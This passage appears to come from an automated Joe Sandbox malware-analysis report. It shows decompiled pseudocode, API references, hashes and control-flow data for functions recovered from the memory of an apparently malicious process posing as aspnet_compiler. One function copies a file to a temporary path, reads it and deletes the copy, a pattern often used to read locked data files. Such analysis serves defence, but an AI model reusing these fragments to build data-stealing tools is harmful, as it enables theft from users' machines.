                                                                                                                                                                                                                                                                  0x10001b0e
                                                                                                                                                                                                                                                                  0x10001b11
                                                                                                                                                                                                                                                                  0x10001b17
                                                                                                                                                                                                                                                                  0x10001b38
                                                                                                                                                                                                                                                                  0x10001b44
                                                                                                                                                                                                                                                                  0x10001b49
                                                                                                                                                                                                                                                                  0x10001b4e
                                                                                                                                                                                                                                                                  0x10001b50
                                                                                                                                                                                                                                                                  0x10001b53
                                                                                                                                                                                                                                                                  0x10001b5b
                                                                                                                                                                                                                                                                  0x10001b67
                                                                                                                                                                                                                                                                  0x10001b6c
                                                                                                                                                                                                                                                                  0x10001b6f
                                                                                                                                                                                                                                                                  0x10001b73
                                                                                                                                                                                                                                                                  0x10001b73
                                                                                                                                                                                                                                                                  0x10001b83
                                                                                                                                                                                                                                                                  0x10001b95
                                                                                                                                                                                                                                                                  0x10001ba7
                                                                                                                                                                                                                                                                  0x10001bac
                                                                                                                                                                                                                                                                  0x10001bb2
                                                                                                                                                                                                                                                                  0x10001bb4
                                                                                                                                                                                                                                                                  0x10001bb6
                                                                                                                                                                                                                                                                  0x10001bb6
                                                                                                                                                                                                                                                                  0x10001bb9
                                                                                                                                                                                                                                                                  0x10001bc7
                                                                                                                                                                                                                                                                  0x10001bce
                                                                                                                                                                                                                                                                  0x10001bcf
                                                                                                                                                                                                                                                                  0x10001bcf
                                                                                                                                                                                                                                                                  0x10001bb9
                                                                                                                                                                                                                                                                  0x10001bd4
                                                                                                                                                                                                                                                                  0x10001bd4
                                                                                                                                                                                                                                                                  0x10001bd7
                                                                                                                                                                                                                                                                  0x10001bdc
                                                                                                                                                                                                                                                                  0x10001bde
                                                                                                                                                                                                                                                                  0x10001be0
                                                                                                                                                                                                                                                                  0x10001bf0
                                                                                                                                                                                                                                                                  0x10001c03
                                                                                                                                                                                                                                                                  0x10001c0d
                                                                                                                                                                                                                                                                  0x10001c14
                                                                                                                                                                                                                                                                  0x10001c1a
                                                                                                                                                                                                                                                                  0x10001c21
                                                                                                                                                                                                                                                                  0x10001c22
                                                                                                                                                                                                                                                                  0x10001c29
                                                                                                                                                                                                                                                                  0x10001c2d
                                                                                                                                                                                                                                                                  0x10001c2d
                                                                                                                                                                                                                                                                  0x10001c48
                                                                                                                                                                                                                                                                  0x10001adf
                                                                                                                                                                                                                                                                  0x10001ae8
                                                                                                                                                                                                                                                                  0x10001ae8
                                                                                                                                                                                                                                                                  0x10001c4d
                                                                                                                                                                                                                                                                  0x10001a6e
                                                                                                                                                                                                                                                                  0x10001c50
                                                                                                                                                                                                                                                                  0x10001c54

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                                                                  • API String ID: 4218353326-230879103
                                                                                                                                                                                                                                                                  • Opcode ID: fad7dcfc9898633119998197420e19d19318a4778bf7c5bf3852d4f9112eb4ca
                                                                                                                                                                                                                                                                  • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fad7dcfc9898633119998197420e19d19318a4778bf7c5bf3852d4f9112eb4ca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 200 10007cc2-10007cd6 201 10007d44-10007d4c 200->201 202 10007cd8-10007cdd 200->202 204 10007d93-10007dab call 10007e35 201->204 205 10007d4e-10007d51 201->205 202->201 203 10007cdf-10007ce4 202->203 203->201 207 10007ce6-10007ce9 203->207 215 10007dae-10007db5 204->215 205->204 206 10007d53-10007d90 call 1000571e * 4 205->206 206->204 207->201 210 10007ceb-10007cf3 207->210 213 10007cf5-10007cf8 210->213 214 10007d0d-10007d15 210->214 213->214 219 10007cfa-10007d0c call 1000571e 213->219 217 10007d17-10007d1a 214->217 218 10007d2f-10007d43 call 1000571e * 2 214->218 220 10007dd4-10007dd8 215->220 221 10007db7-10007dbb 215->221 217->218 223 10007d1c-10007d2e call 1000571e 217->223 218->201 219->214 224 10007df0-10007dfc 220->224 225 10007dda-10007ddf 220->225 228 10007dd1 221->228 229 10007dbd-10007dc0 221->229 223->218 224->215 235 10007dfe-10007e0b call 1000571e 224->235 232 10007de1-10007de4 225->232 233 10007ded 225->233 228->220 229->228 237 10007dc2-10007dd0 call 1000571e * 2 229->237 232->233 241 10007de6-10007dec call 1000571e 232->241 233->224 237->228 241->233
                                                                                                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                                                                                                  			E10007CC2(intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _t25;
                                                                                                                                                                                                                                                                  				intOrPtr* _t26;
                                                                                                                                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                                                                                                                                  				intOrPtr* _t29;
                                                                                                                                                                                                                                                                  				intOrPtr* _t31;
                                                                                                                                                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                                                                                                                                                  				intOrPtr* _t46;
                                                                                                                                                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                                                                                                                                  				intOrPtr* _t68;
                                                                                                                                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t72 = _a4;
                                                                                                                                                                                                                                                                  				_t25 =  *((intOrPtr*)(_t72 + 0x88));
                                                                                                                                                                                                                                                                  				if(_t25 != 0 && _t25 != 0x10013700) {
                                                                                                                                                                                                                                                                  					_t45 =  *((intOrPtr*)(_t72 + 0x7c));
                                                                                                                                                                                                                                                                  					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                                                  						_t46 =  *((intOrPtr*)(_t72 + 0x84));
                                                                                                                                                                                                                                                                  						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                                                                                                                                                  							E1000571E(_t46);
                                                                                                                                                                                                                                                                  							0x100090ba( *((intOrPtr*)(_t72 + 0x88)));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t47 =  *((intOrPtr*)(_t72 + 0x80));
                                                                                                                                                                                                                                                                  						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                                                  							E1000571E(_t47);
                                                                                                                                                                                                                                                                  							0x100091b8( *((intOrPtr*)(_t72 + 0x88)));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E1000571E( *((intOrPtr*)(_t72 + 0x7c)));
                                                                                                                                                                                                                                                                  						E1000571E( *((intOrPtr*)(_t72 + 0x88)));
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t26 =  *((intOrPtr*)(_t72 + 0x8c));
                                                                                                                                                                                                                                                                  				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                                                  					E1000571E( *((intOrPtr*)(_t72 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                                                  					E1000571E( *((intOrPtr*)(_t72 + 0x94)) - 0x80);
                                                                                                                                                                                                                                                                  					E1000571E( *((intOrPtr*)(_t72 + 0x98)) - 0x80);
                                                                                                                                                                                                                                                                  					E1000571E( *((intOrPtr*)(_t72 + 0x8c)));
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E10007E35( *((intOrPtr*)(_t72 + 0x9c)));
                                                                                                                                                                                                                                                                  				_t28 = 6;
                                                                                                                                                                                                                                                                  				_t53 = _t72 + 0xa0;
                                                                                                                                                                                                                                                                  				_v8 = _t28;
                                                                                                                                                                                                                                                                  				_t68 = _t72 + 0x28;
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t68 - 8)) != 0x10013638) {
                                                                                                                                                                                                                                                                  						_t31 =  *_t68;
                                                                                                                                                                                                                                                                  						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                                                  							E1000571E(_t31);
                                                                                                                                                                                                                                                                  							E1000571E( *_t53);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t28 = _v8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t68 - 0xc)) != 0) {
                                                                                                                                                                                                                                                                  						_t29 =  *((intOrPtr*)(_t68 - 4));
                                                                                                                                                                                                                                                                  						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                                                  							E1000571E(_t29);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t28 = _v8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t53 = _t53 + 4;
                                                                                                                                                                                                                                                                  					_t68 = _t68 + 0x10;
                                                                                                                                                                                                                                                                  					_t28 = _t28 - 1;
                                                                                                                                                                                                                                                                  					_v8 = _t28;
                                                                                                                                                                                                                                                                  				} while (_t28 != 0);
                                                                                                                                                                                                                                                                  				return E1000571E(_t72);
                                                                                                                                                                                                                                                                  			}















                                                                                                                                                                                                                                                                  0x10007cca
                                                                                                                                                                                                                                                                  0x10007cce
                                                                                                                                                                                                                                                                  0x10007cd6
                                                                                                                                                                                                                                                                  0x10007cdf
                                                                                                                                                                                                                                                                  0x10007ce4
                                                                                                                                                                                                                                                                  0x10007ceb
                                                                                                                                                                                                                                                                  0x10007cf3
                                                                                                                                                                                                                                                                  0x10007cfb
                                                                                                                                                                                                                                                                  0x10007d06
                                                                                                                                                                                                                                                                  0x10007d0c
                                                                                                                                                                                                                                                                  0x10007d0d
                                                                                                                                                                                                                                                                  0x10007d15
                                                                                                                                                                                                                                                                  0x10007d1d
                                                                                                                                                                                                                                                                  0x10007d28
                                                                                                                                                                                                                                                                  0x10007d2e
                                                                                                                                                                                                                                                                  0x10007d32
                                                                                                                                                                                                                                                                  0x10007d3d
                                                                                                                                                                                                                                                                  0x10007d43
                                                                                                                                                                                                                                                                  0x10007ce4
                                                                                                                                                                                                                                                                  0x10007d44
                                                                                                                                                                                                                                                                  0x10007d4c
                                                                                                                                                                                                                                                                  0x10007d5f
                                                                                                                                                                                                                                                                  0x10007d72
                                                                                                                                                                                                                                                                  0x10007d80
                                                                                                                                                                                                                                                                  0x10007d8b
                                                                                                                                                                                                                                                                  0x10007d90
                                                                                                                                                                                                                                                                  0x10007d99
                                                                                                                                                                                                                                                                  0x10007da1
                                                                                                                                                                                                                                                                  0x10007da2
                                                                                                                                                                                                                                                                  0x10007da8
                                                                                                                                                                                                                                                                  0x10007dab
                                                                                                                                                                                                                                                                  0x10007dae
                                                                                                                                                                                                                                                                  0x10007db5
                                                                                                                                                                                                                                                                  0x10007db7
                                                                                                                                                                                                                                                                  0x10007dbb
                                                                                                                                                                                                                                                                  0x10007dc3
                                                                                                                                                                                                                                                                  0x10007dca
                                                                                                                                                                                                                                                                  0x10007dd0
                                                                                                                                                                                                                                                                  0x10007dd1
                                                                                                                                                                                                                                                                  0x10007dd1
                                                                                                                                                                                                                                                                  0x10007dd8
                                                                                                                                                                                                                                                                  0x10007dda
                                                                                                                                                                                                                                                                  0x10007ddf
                                                                                                                                                                                                                                                                  0x10007de7
                                                                                                                                                                                                                                                                  0x10007dec
                                                                                                                                                                                                                                                                  0x10007ded
                                                                                                                                                                                                                                                                  0x10007ded
                                                                                                                                                                                                                                                                  0x10007df0
                                                                                                                                                                                                                                                                  0x10007df3
                                                                                                                                                                                                                                                                  0x10007df6
                                                                                                                                                                                                                                                                  0x10007df9
                                                                                                                                                                                                                                                                  0x10007df9
                                                                                                                                                                                                                                                                  0x10007e0b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,10007E60,?,?,10007D9E,?,00000000,?,00000000,00000000,?,10005AB5,00000000,00000000), ref: 10005734
                                                                                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,10007E60,?,?,10007D9E,?,00000000,?,00000000,00000000,?,10005AB5,00000000,00000000), ref: 10005746
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: 89edf858855838b098a1f93734d032720504993b3711df7e842e06a2e0db3c3e
                                                                                                                                                                                                                                                                  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89edf858855838b098a1f93734d032720504993b3711df7e842e06a2e0db3c3e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E100059D6(char _a4) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t26 = _a4;
                                                                                                                                                                                                                                                                  				_t52 =  *_a4;
                                                                                                                                                                                                                                                                  				if( *_a4 != 0x1000dad0) {
                                                                                                                                                                                                                                                                  					E1000571E(_t52);
                                                                                                                                                                                                                                                                  					_t26 = _a4;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                                                  				E1000571E( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                                                  				_v8 =  &_a4;
                                                                                                                                                                                                                                                                  				E1000589C(5,  &_v8);
                                                                                                                                                                                                                                                                  				_v8 =  &_a4;
                                                                                                                                                                                                                                                                  				return E100058EC(4,  &_v8);
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x100059dc
                                                                                                                                                                                                                                                                  0x100059df
                                                                                                                                                                                                                                                                  0x100059e7
                                                                                                                                                                                                                                                                  0x100059ea
                                                                                                                                                                                                                                                                  0x100059ef
                                                                                                                                                                                                                                                                  0x100059f2
                                                                                                                                                                                                                                                                  0x100059f6
                                                                                                                                                                                                                                                                  0x10005a01
                                                                                                                                                                                                                                                                  0x10005a0c
                                                                                                                                                                                                                                                                  0x10005a17
                                                                                                                                                                                                                                                                  0x10005a22
                                                                                                                                                                                                                                                                  0x10005a2d
                                                                                                                                                                                                                                                                  0x10005a38
                                                                                                                                                                                                                                                                  0x10005a43
                                                                                                                                                                                                                                                                  0x10005a51
                                                                                                                                                                                                                                                                  0x10005a59
                                                                                                                                                                                                                                                                  0x10005a62
                                                                                                                                                                                                                                                                  0x10005a6a
                                                                                                                                                                                                                                                                  0x10005a7e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,10007E60,?,?,10007D9E,?,00000000,?,00000000,00000000,?,10005AB5,00000000,00000000), ref: 10005734
                                                                                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,10007E60,?,?,10007D9E,?,00000000,?,00000000,00000000,?,10005AB5,00000000,00000000), ref: 10005746
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: 23c009df00fc52c8476aef05605efb5fb152faf53464b55ffd1fb8ecb42efc2b
                                                                                                                                                                                                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23c009df00fc52c8476aef05605efb5fb152faf53464b55ffd1fb8ecb42efc2b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                                                                                                                  			E10001CCA(WCHAR* __ecx, long* __edx, void* __edi) {
                                                                                                                                                                                                                                                                  				long _v8;
                                                                                                                                                                                                                                                                  				long* _v12;
                                                                                                                                                                                                                                                                  				short _v532;
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                                                                                                                  				int _t26;
                                                                                                                                                                                                                                                                  				long* _t30;
                                                                                                                                                                                                                                                                  				void* _t31;
                                                                                                                                                                                                                                                                  				void* _t39;
                                                                                                                                                                                                                                                                  				void* _t43;
                                                                                                                                                                                                                                                                  				long _t44;
                                                                                                                                                                                                                                                                  				WCHAR* _t46;
                                                                                                                                                                                                                                                                  				void* _t47;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t43 = __edi;
                                                                                                                                                                                                                                                                  				_t40 = __ecx;
                                                                                                                                                                                                                                                                  				_v12 = __edx;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_t46 = __ecx;
                                                                                                                                                                                                                                                                  				E10002C40(__edi,  &_v532, 0, 0x208);
                                                                                                                                                                                                                                                                  				E10004638( &_v532, _t46);
                                                                                                                                                                                                                                                                  				E10004638( &_v532, 0x10011c28);
                                                                                                                                                                                                                                                                  				CopyFileW(_t46,  &_v532, 0);
                                                                                                                                                                                                                                                                  				_t47 = CreateFileW( &_v532, 0x80000000, 0, 0, 3, 0x80, 0);
                                                                                                                                                                                                                                                                  				if(_t47 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_push(_t43);
                                                                                                                                                                                                                                                                  					_t44 = GetFileSize(_t47, 0);
                                                                                                                                                                                                                                                                  					_push(_t44);
                                                                                                                                                                                                                                                                  					_t39 = E10001EDE(_t40, _t47, __eflags);
                                                                                                                                                                                                                                                                  					_t26 = ReadFile(_t47, _t39, _t44,  &_v8, 0);
                                                                                                                                                                                                                                                                  					_push(_t47);
                                                                                                                                                                                                                                                                  					__eflags = _t26;
                                                                                                                                                                                                                                                                  					if(_t26 != 0) {
                                                                                                                                                                                                                                                                  						CloseHandle();
                                                                                                                                                                                                                                                                  						DeleteFileW( &_v532);
                                                                                                                                                                                                                                                                  						_t30 = _v12;
                                                                                                                                                                                                                                                                  						__eflags = _t30;
                                                                                                                                                                                                                                                                  						if(_t30 != 0) {
                                                                                                                                                                                                                                                                  							 *_t30 = _t44;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t31 = _t39;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						CloseHandle();
                                                                                                                                                                                                                                                                  						DeleteFileW( &_v532);
                                                                                                                                                                                                                                                                  						_t31 = 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return _t31;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				DeleteFileW( &_v532);
                                                                                                                                                                                                                                                                  				return 0;
                                                                                                                                                                                                                                                                  			}
















                                                                                                                                                                                                                                                                  0x10001cca
                                                                                                                                                                                                                                                                  0x10001cca
                                                                                                                                                                                                                                                                  0x10001cd7
                                                                                                                                                                                                                                                                  0x10001ce5
                                                                                                                                                                                                                                                                  0x10001cea
                                                                                                                                                                                                                                                                  0x10001cec
                                                                                                                                                                                                                                                                  0x10001cf9
                                                                                                                                                                                                                                                                  0x10001d0a
                                                                                                                                                                                                                                                                  0x10001d1b
                                                                                                                                                                                                                                                                  0x10001d3d
                                                                                                                                                                                                                                                                  0x10001d42
                                                                                                                                                                                                                                                                  0x10001d55
                                                                                                                                                                                                                                                                  0x10001d5e
                                                                                                                                                                                                                                                                  0x10001d60
                                                                                                                                                                                                                                                                  0x10001d69
                                                                                                                                                                                                                                                                  0x10001d72
                                                                                                                                                                                                                                                                  0x10001d78
                                                                                                                                                                                                                                                                  0x10001d79
                                                                                                                                                                                                                                                                  0x10001d7b
                                                                                                                                                                                                                                                                  0x10001d94
                                                                                                                                                                                                                                                                  0x10001da1
                                                                                                                                                                                                                                                                  0x10001da7
                                                                                                                                                                                                                                                                  0x10001daa
                                                                                                                                                                                                                                                                  0x10001dac
                                                                                                                                                                                                                                                                  0x10001dae
                                                                                                                                                                                                                                                                  0x10001dae
                                                                                                                                                                                                                                                                  0x10001db0
                                                                                                                                                                                                                                                                  0x10001d7d
                                                                                                                                                                                                                                                                  0x10001d7d
                                                                                                                                                                                                                                                                  0x10001d8a
                                                                                                                                                                                                                                                                  0x10001d90
                                                                                                                                                                                                                                                                  0x10001d90
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10001db2
                                                                                                                                                                                                                                                                  0x10001d4b
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1454806937-0
                                                                                                                                                                                                                                                                  • Opcode ID: 43830dfbcb923e477666d5d2cb3d13bbad219fc3305db6ddded95615c9a61994
                                                                                                                                                                                                                                                                  • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43830dfbcb923e477666d5d2cb3d13bbad219fc3305db6ddded95615c9a61994
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
